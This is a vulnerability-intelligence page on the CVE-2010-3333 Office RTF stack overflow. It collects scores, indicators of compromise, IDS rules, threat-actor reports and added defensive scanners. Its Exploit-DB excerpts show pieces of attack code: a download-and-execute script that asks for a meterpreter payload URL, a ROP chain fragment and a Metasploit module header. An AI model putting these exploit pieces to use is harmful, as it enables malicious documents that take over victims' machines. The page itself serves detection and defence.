CVE-2010-3333
Published 2010-11-10
Priority: P185 · high · CVSS 3.1 base score 7.8
CVSS 3.1 vector: AV:L / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H
Flags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-03-24
Exploited in the wild
EPSS: 89.50% (99.8th percentile)
Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
Affected
7 ranges recorded, all for microsoft / office; the source carries no version bounds or fixed-in versions for any of them (see the CVE description above for the affected product list).
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office (7 ranges) | — | — |
Detection & IOCs (extracted from sources)
- registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"System Application" = c:\system\WindowsSecurityService[2 or 3].exe
- snort: SID 21964
- snort: SID 22095
- snort: SID 22101
- snort: SID 22102
- Detect the CVE-2010-3333 RTF exploit payload via the malicious service's C2 beacon: look for HTTP GET requests carrying the custom headers 'Extra-Data-Bind', 'Extra-Data-Space' and 'Extra-Data'; the last of these carries the initial compromise beacon.
- Snort SIDs 22101 and 22102 detect the malicious RTF file itself; SIDs 21964 and 22095 detect the post-exploitation C2 beacon traffic from the dropped service (cydll.dll).
- Rover establishes persistence via an HKCU Run key with value name 'System Application' pointing to c:\system\WindowsSecurityService[2 or 3].exe; monitor this registry path for that value name.
- Rover sends heartbeat HTTP traffic to 46.166.165.254 every 5 seconds, exfiltrates screenshots every 60 minutes and keylog data every 10 seconds; high-frequency periodic HTTP beaconing to this IP is a strong indicator.
- Aoqin Dragon's Mongall backdoor can be identified by its mutex names: Flag_Running, Download_Flag, Running_Flag, Flag_Runnimg_2810, Flag_Running_2016 and Flag_Running_2014RC4; scan process memory or sandbox reports for these strings.
- The CVE-2010-3333 exploit shellcode drops a randomly named .exe into the user's Local Settings\temp directory; monitor for executable creation in that path immediately after Word/RTF document open events.
- The Mongall backdoor's encoding/encryption algorithm varies by mutex version: Base64 (type 3) for Flag_Running/Download_Flag/Running_Flag, modified Base64 (type 2) for Flag_Runnimg_2810/Flag_Running_2016, and RC4+Base64 (type 1) for Flag_Running_2014RC4; decryption scripts must handle all three variants.
- The systemupdateAPI.exe downloader was no longer hosted on newsumbrella[.]net at the time of analysis; the domain may rotate payloads under the same /ne3s/ parent directory path.
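The file-side indicators can be checked offline before a document reaches Word: the `{\rt` header that the Suricata rule further down keys on (`content:"|7b 5c|rt"; within:4`) and the `pFragments` shape property that the Metasploit module below abuses. The scanner here is an added example written for this page, not code from any of the cited sources or vendors. The `{\sp{\sn NAME}{\sv VALUE}}` layout is standard RTF shape-property syntax; the `1;<count>;<hex>` value layout is assumed from how the Metasploit module builds its payload; the 256-byte threshold is an arbitrary starting point to tune against known-good documents; both sample documents are constructed inline and contain filler, not shellcode.

```python
"""Heuristic offline scanner for RTF documents carrying an oversized pFragments
shape property (the construct abused by the CVE-2010-3333 exploits).

Added example; thresholds and sample inputs are assumptions, see comments."""
import re
from typing import Dict, List, Tuple

# Constructed sample documents (built for this example, not captured malware).
BENIGN_RTF = rb"{\rtf1\ansi{\fonttbl{\f0 Arial;}}\f0 Hello, world.\par}"
SUSPECT_RTF = (
    rb"{\rtf1\ansi{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;512;"
    + b"90" * 512          # filler hex, not shellcode
    + rb"}}}}\par}"
)

# Assumed threshold: genuine pFragments values describe a handful of path
# fragments and stay short; the exploit documents pad the hex stream far past
# the target buffer. Tune against a corpus of known-good RTF.
MAX_PFRAGMENTS_LEN = 256

# Standard RTF shape-property layout: {\sp{\sn NAME}{\sv VALUE}}.
SHAPE_PROP_RE = re.compile(
    rb"\{\\sp\s*\{\\sn\s+([A-Za-z0-9]+)\s*\}\s*\{\\sv\s+([^}]*)\}"
)
HEX_RE = re.compile(rb"[0-9A-Fa-f]*")


def has_rtf_magic(data: bytes) -> bool:
    """Same check as the Suricata rule: content:"|7b 5c|rt"; within:4."""
    return data[:4] == b"{\\rt"


def shape_properties(data: bytes) -> List[Tuple[str, bytes]]:
    """Return (name, value) for every shape property, with RTF line wrapping removed."""
    return [
        (m.group(1).decode("ascii"), re.sub(rb"\s+", b"", m.group(2)))
        for m in SHAPE_PROP_RE.finditer(data)
    ]


def scan_rtf(data: bytes, max_len: int = MAX_PFRAGMENTS_LEN) -> Dict[str, object]:
    """Flag pFragments values that are oversized or whose data part is not hex."""
    reasons: List[str] = []
    payload_sizes: List[int] = []
    props = shape_properties(data)
    pfrag = [value for name, value in props if name.lower() == "pfragments"]
    for value in pfrag:
        if len(value) > max_len:
            reasons.append(f"pFragments value is {len(value)} bytes (> {max_len})")
        # Assumed value layout '1;<fragment count>;<hex data>' (how the
        # Metasploit module builds it); anything else in the data part is odd.
        parts = value.split(b";", 2)
        if len(parts) == 3 and HEX_RE.fullmatch(parts[2]):
            payload_sizes.append(len(parts[2]) // 2)
        else:
            reasons.append("pFragments value does not follow the 1;count;hex layout")
    return {
        "rtf_magic": has_rtf_magic(data),
        "shape_properties": len(props),
        "pfragments": len(pfrag),
        "payload_bytes": payload_sizes,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_RTF), ("suspect", SUSPECT_RTF)):
        print(label, scan_rtf(doc))
```

Run it on a directory of mail attachments and alert on `suspicious`; a document whose shape property carries kilobytes of hex has no legitimate reason to exist. The header check alone is not a detection (every RTF passes it); it is what lets a gateway rule pick the file out of a stream before the deeper parse runs.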
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 9.3 | HIGH (v2 has no Critical band) | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 7.8 | HIGH | — |
| cisa | — | 7.8 | HIGH | — |
GHSA
GHSA-r838-75c6-gjj4: Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 20
ghsa_unreviewed·2022-05-14·CVE-2010-3333 [HIGH] CWE-119
Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
VulnCheck
Microsoft Office Stack-based Buffer Overflow Vulnerability
vulncheck·2010·CVSS 7.8·CVE-2010-3333 [HIGH] CWE-119
A stack-based buffer overflow vulnerability exists in the parsing of RTF data in Microsoft Office and allows an attacker to perform remote code execution.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://documents.trendmicro.com/assets/wp/wp_luckycat_redux.pdf; https://1vx.ug/archive/Symantec/luckycat-hackers-12-en.pdf; https://securelist.com/red-october-diplomatic-cyber-attacks-investigation/36740/; https://securelist.com/adobe-flash-player-0-day-and-hackingteams-remote-control-system/64215/; https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/; https://securelist.com/nettraveler-is-running-red-star-apt-attacks-compromi
CISA
Microsoft Office Stack-based Buffer Overflow Vulnerability
cisa·2022-03-03·CVSS 7.8·CVE-2010-3333 [HIGH] CWE-119
Affected: Microsoft Office
A stack-based buffer overflow vulnerability exists in the parsing of RTF data in Microsoft Office and allows an attacker to perform remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2010-3333
Remediation Due Date: 2022-03-24
Suricata
ET WEB_CLIENT Microsoft Office RTF Stack Buffer Overflow
suricata·2015-03-16·CVE-2010-3333
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Office RTF Stack Buffer Overflow"; flow:established,to_client; flowbits:set,ETPRO.RTF; flowbits:noalert; file.data; content:"|7b 5c|rt"; within:4; reference:cve,2010-3333; classtype:misc-activity; sid:2020699; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2015_03_16, cve CVE_2010_3333, deployment Perimeter, confidence High, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_14;)
Suricata
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
suricata·2013-05-29·CVE-2010-3333
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Exploit-DB
Microsoft Office 2010 - Download Execute
exploitdb·2013-02-20·CVE-2010-3333
---
#!/usr/bin/python
# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
##########
#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe
import binascii
import sys
import time
print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in th
Exploit-DB
Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)
exploitdb·2012-01-08·CVE-2010-3333
---
#!/usr/bin/python
#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#
#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#######################################
Exploit-DB
Microsoft Office 2010 - '.RTF' Header Stack Overflow
exploitdb·2011-07-03·CVSS 7.8·CVE-2010-3333 [HIGH]
---
# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j gmail )
# Version: MS Office
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
# http://www.exploit-db.com/docs/17469.pdf
#
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
# http://www.0days.ir/article/
#
# and the Rop :
3F2CB9E0 POP ECX
RETN
# HeapCreate() IAT = 3F10115C
3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# EAX == HeapCreate() Address
3F39AFCF CALL EAX
RETN
# Call HeapCreate() and Cr
Exploit-DB
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04·CVE-2010-3333
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Metasploit
MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
metasploit
This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It
Sentinelone
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
blogs_sentinelone·2022-06-09
## Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Executive Summary
- Aoqin Dragon, a threat actor SentinelLABS has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
- Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
- Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
- Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential association to UNC94 (Mandiant).
## Overview
SentinelLABS has uncovered a cluster of activity beginning a
Unit42
ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe
blogs_unit42·2016-03-25·CVSS 7.8 [HIGH]
## ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe
Robert Falcone, Simon Conant · Published: March 25, 2016
Tags: Malware, Threat Actor Groups, Threat Research, Operation C-Major, Operation Transparent Tribe, ProjectM, Trojan
Unit 42 is currently researching an attack campaign that targets government and military personnel of India. This attack appears to overlap with the Operation Transparent Tribe and Operation C-Major campaigns that targeted Indian embassies in Saudi Arabia and Kazakhstan, as well as the Indian military.
We are tracking the group of actors involved in this campaign as ‘ProjectM.’ During our research, we found a linkage between the infrastructure used by ProjectM and an individual from Pakistan. We cannot definitively confirm this individual is involved with this attack campaign, but the evidence that we will discuss in this blog post suggests that it is highly likely that this indiv
Unit42
New Malware 'Rover' Targets Indian Ambassador to Afghanistan
blogs_unit42·2016-02-29·CVSS 7.8 [HIGH]
## New Malware 'Rover' Targets Indian Ambassador to Afghanistan
Vicky Ray, Kaoru Hayashi · Published: February 29, 2016
Tags: Malware, Threat Research, OpenAL, OpenCV, Rover, Trojan, VirusTotal
On December 24, 2015, Unit 42 identified a targeted attack, delivered via email, on a high profile Indian diplomat, an Ambassador to Afghanistan. The body and content of the email suggest that it was crafted and spoofed to look like it was sent by the current Defence Minister of India, Mr. Manohar Parrikar, commending the Ambassador on his contributions and success.
India has been a key nation in building and funding Afghanistan’s infrastructure and economic development, which includes setting up iron ore mines, steel plants, power plants and transportation systems, helping reconstruct the Salma Dam and constructing a new Parliament Complex for the Afghan Government.
Given India’s significant contributions to the development of Afghanistan, it is likely that there may be groups or nation
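Two of the Rover indicators in the Detection & IOCs list above are checkable from proxy or web logs: the Extra-Data-Bind / Extra-Data-Space / Extra-Data header set on the initial GET, and the fixed 5-second heartbeat to 46.166.165.254. The Python below is an added example, not code from Unit 42 or from the Snort rules cited on this page. The log events are constructed inline, 93.184.216.34 and 198.51.100.7 are placeholder addresses, and min_requests and max_jitter are assumed tuning values.

```python
"""Network-side checks for the post-exploitation beacon described above:
the Extra-Data-* header set and fixed-interval heartbeats to a single host.

Added example; the events are constructed, the thresholds are assumptions."""
from collections import defaultdict
from statistics import median, pstdev
from typing import Dict, List

ROVER_C2 = "46.166.165.254"          # heartbeat destination named in the IOC list
BEACON_HEADERS = ("extra-data-bind", "extra-data-space", "extra-data")

# Constructed proxy log: one heartbeat every 5 s to the C2, two ordinary fetches
# to a placeholder host (93.184.216.34) and one GET carrying the Extra-Data-*
# headers to 198.51.100.7 (TEST-NET-2, placeholder). Not real captures.
EVENTS: List[dict] = [
    {"ts": 1000.0 + 5 * i, "dst": ROVER_C2, "method": "GET",
     "headers": {"User-Agent": "Mozilla/4.0"}}
    for i in range(12)
] + [
    {"ts": 1003.0, "dst": "93.184.216.34", "method": "GET",
     "headers": {"User-Agent": "Mozilla/5.0", "Accept": "*/*"}},
    {"ts": 1031.0, "dst": "93.184.216.34", "method": "GET",
     "headers": {"User-Agent": "Mozilla/5.0", "Accept": "*/*"}},
    {"ts": 1050.0, "dst": "198.51.100.7", "method": "GET",
     "headers": {"Extra-Data-Bind": "1", "Extra-Data-Space": "0",
                 "Extra-Data": "Y29uc3RydWN0ZWQ="}},
]


def has_beacon_headers(headers: Dict[str, str]) -> bool:
    """True when all three custom headers are present (names compared case-insensitively)."""
    names = {name.lower() for name in headers}
    return all(h in names for h in BEACON_HEADERS)


def header_beacons(events: List[dict]) -> List[dict]:
    """GET requests carrying the Extra-Data-Bind / -Space / -Data header set."""
    return [e for e in events if e["method"] == "GET" and has_beacon_headers(e["headers"])]


def periodic_destinations(events: List[dict], min_requests: int = 6,
                          max_jitter: float = 0.5) -> Dict[str, float]:
    """Destinations contacted at a near-constant interval.

    min_requests and max_jitter (seconds, population std-dev of the gaps) are
    assumed tuning values; a 5 s heartbeat clears them within the first minute.
    Returns {dst: median_gap_seconds}.
    """
    by_dst: Dict[str, List[float]] = defaultdict(list)
    for e in events:
        by_dst[e["dst"]].append(e["ts"])
    result: Dict[str, float] = {}
    for dst, stamps in by_dst.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter:
            result[dst] = median(gaps)
    return result


if __name__ == "__main__":
    print("header beacons:", [e["dst"] for e in header_beacons(EVENTS)])
    print("periodic destinations:", periodic_destinations(EVENTS))
```

The header check is exact and cheap; the periodicity check is the one that survives an infrastructure change, because it keys on the implant's timer rather than on the IP, so run it per client and per destination and review anything with a sub-minute median and near-zero jitter.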
Unit42
Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists
blogs_unit42·2016-01-24
## Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists
Robert Falcone, Jen Miller-Osborn · Published: January 24, 2016
Tags: Malware, Threat Research, Android, Apple, BrutishCommand, CallMe, Cyber espionage, Cyber Threat Alliance, Cybersecurity, Espionage, FakeM, Mac OS X, Microsoft, MobileOrder, Psylo, Scarlet Mimic, SkiBoot Loader, SubtractThis, Trojans
## Executive Summary
Over the past seven months, Unit 42 has been investigating a series of attacks we attribute to a group we have code named “Scarlet Mimic.” The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved.
The goal of this report is to expose the tools, tactics and infrastructure deployed by Scarlet Mimic in order to increase awareness of this threat and decrease its operational
Tenable
Trouble in the Tropics
blogs_tenable·2015-06-04
Trouble in the Tropics
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6 [LOW]
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
- Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
- Internet Explorer: MS14-021 for CVE-2014-1776, Qualys ID: 100191
- MS14-012 for CVE-2014-0322
- MS13-038 for CVE-2013-1347
- MS13-008 for CVE-2012-4792
- MS10-01
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8 [HIGH]
## Super Tuesday: A Patch Tuesday We Won’t Forget
Ryan Olson · Published: October 15, 2014
Tags: Threat Research, Vulnerabilities, BlackEnergy, ISight, Microsoft, Microsoft Security Bulletin, Patch Tuesday, PowerShell Empire, Sandworm
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities, Adobe issued updates for Flash and ColdFusion, and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
### Sandworm
The first to drop was the Sandworm Campaign, a report from iSight partners, which described attacks on European and American targets in the month of August using new versions of the BlackEnergy bot, but the group behind the attacks has been operating since at least 2009. The biggest news here was the group’s exploitation of a “new” vulnerability in Windows, CV
Talos
Phishing Games
blogs_talos·2012-07-30·CVSS 7.8·CVE-2010-3333 [HIGH]
## Phishing Games
It's no surprise that, as the 2012 London Olympic games approach, cybercriminals are using the event as bait for a variety of scams. Sure, there are plenty of 419 scams revolving around the games - but we'll assume that none of the readers of this blog are dumb enough to fall an online lottery scam or the like. I'll focus today on a pair of different phish we've seen with more dirty tricks - one with an attached RTF file exploiting CVE-2010-3333, and one with a fairly standard link off to an exploit kit.
The email with the attached RTF has come in from several different sources, and all of them were classic "please read the attached file to do the thing we think you're interested in" sorts of phish. For those foolish enough to be opening random documents from strangers out of their email,
Zscaler
Zscaler provides Protection During MS Patch Cycle|11-09-2010
blogs_zscaler·CVSS 7.8
[HIGH] Zscaler provides Protection During MS Patch Cycle|11-09-2010
Threat Intel
Aoqin Dragon
threat_intel·CVSS 7.8 [HIGH]
# Threat Actor Profile: Aoqin Dragon
ATT&CK ID: G1007
Also known as: Aoqin Dragon
Suspected origin: China
## Overview
Aoqin Dragon is a suspected Chinese cyber espionage threat group that has been active since at least 2013. Aoqin Dragon has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between Aoqin Dragon and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)
## Techniques (TTPs)
### Resource Development
- T1587.001 Malware
Usage: Aoqin Dragon has used custom malware, including Mongall and Heyoka Backdoor, in their operations.(Citation: SentinelOne Aoqin Dragon June 2022)
- T1588.002 Tool
Usage: A
Threat Intel
Transparent Tribe (Transparent Tribe, COPPER FIELDSTONE, APT36)
threat_intel
# Threat Actor Profile: Transparent Tribe
ATT&CK ID: G0134
Also known as: Transparent Tribe, COPPER FIELDSTONE, APT36, Mythic Leopard, ProjectM
Suspected origin: Pakistan
## Overview
Transparent Tribe is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)
## Campaigns
- **C0011** (C0011) [2021-12-01T06:00:00.000Z to 2022-07-01T05:00:00.000Z]
C0011 was a suspected cyber espionage campaign conducted by Transparent Tribe that targeted students at universities and colleges in India. Security researchers noted this ca
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Almuthanna Alageel and Sergio Maffeis
Department of Computing, Imperial College London, London, United Kingdom
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Technical Aspects of Cyber Kill Chain
arxiv_fulltext·2016-06-10
Tarun Yadav and Rao Arvind Mallari
Scientists, Defence Research and Development Organisation, India
## Abstract
Recent trends in targeted cyber-attacks has increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. Cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. Cyber kill chain in simple terms is an attack chain, the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categories the methodologies, techniques and tools involv
References
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880
- http://secunia.com/advisories/38521
- http://secunia.com/advisories/42144
- http://securityreason.com/securityalert/8293
- http://www.securityfocus.com/bid/44652
- http://www.securitytracker.com/id?1024705
- http://www.us-cert.gov/cas/techalerts/TA10-313A.html
- http://www.vupen.com/english/advisories/2010/2923
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-087
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11931
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-3333
Timeline
- 2010-11-10: Published
- 2022-03-03: Added to CISA KEV
- Exploited in the wild